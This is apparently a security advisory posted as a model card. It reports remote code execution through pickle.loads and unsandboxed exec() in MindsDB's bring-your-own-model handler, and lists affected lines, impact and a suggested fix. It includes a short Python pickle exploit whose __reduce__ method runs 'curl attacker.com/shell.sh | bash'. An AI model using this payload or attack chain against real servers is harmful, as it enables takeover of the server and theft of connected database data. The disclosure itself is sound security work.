YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

MindsDB — RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler

Vulnerability Type

CWE-502: Deserialization of Untrusted Data

Severity

Critical — Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.

Affected Code

File: mindsdb/integrations/handlers/byom_handler/byom_handler.py

Three functions deserialize user-controlled model state:

# Line 398 — predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

# Line 407 — finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE

# Line 419 — describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

Also affected:

mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55:

model_state = pickle.loads(model_state)  # subprocess wrapper

mindsdb/interfaces/query_context/context_controller.py:275:

steps_data = pickle.loads(data)  # from cache

mindsdb/integrations/libs/process_cache.py:45:

# IPC via pickle — exception propagation

Attack Chain

Attacker creates a BYOM model via MindsDB SQL:

CREATE MODEL pwned
PREDICT target
USING engine='byom',
      code='class Model: pass';

The model's train() returns pickle.dumps(self.__dict__) — but an attacker who controls the model code can override __dict__ to contain a malicious pickle payload
When predict() is called (e.g., SELECT * FROM pwned WHERE ...), the server deserializes the model state with pickle.loads(model_state) → arbitrary code execution

Alternative: Direct state injection

If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:

import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage → next predict() = RCE

AI Impact (10x Multiplier)

MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:

Model poisoning — replace legitimate model with backdoored version
Training data exfiltration — RCE gives access to all data MindsDB has access to
Database compromise — MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
Supply chain — poisoned model persists across restarts and affects all queries

Known CVE Context

MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 — eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.

Suggested Fix

Replace pickle.loads with a safe alternative:

import json
import jsonpickle

def predict(self, df, model_state, args):
    # Use JSON-based deserialization instead of pickle
    model_state = json.loads(model_state)
    # Or use restricted unpickler:
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state

Invariant Violated

S16 (DeserializationGuard): Application MUST NOT use pickle.loads on data from user-controlled or shared storage.

Additional Finding: Direct `exec()` on User Model Code

File: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80

def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # ← Direct code execution, NO sandbox
    return module

This is the execution path for BYOM models. When a user creates a model with engine='byom', their Python code is passed to import_string() which calls exec() with no sandboxing, no AST filtering, no import restrictions.

The same file also uses pickle.loads() for IPC (stdin/stdout between parent and worker):

def decode(encoded):
    return pickle.loads(encoded)  # Line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
        obj = decode(encoded)  # pickle.loads on stdin

Combined Chain

User creates BYOM model with malicious code → exec(code) → RCE
Even if exec were sandboxed, the pickle IPC channel is unprotected → pickle.loads bypass

This is a defense-in-depth failure — two independent RCE vectors in the same module.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

MindsDB — RCE via pickle.loads() in BYOM (Bring Your Own Model) Handler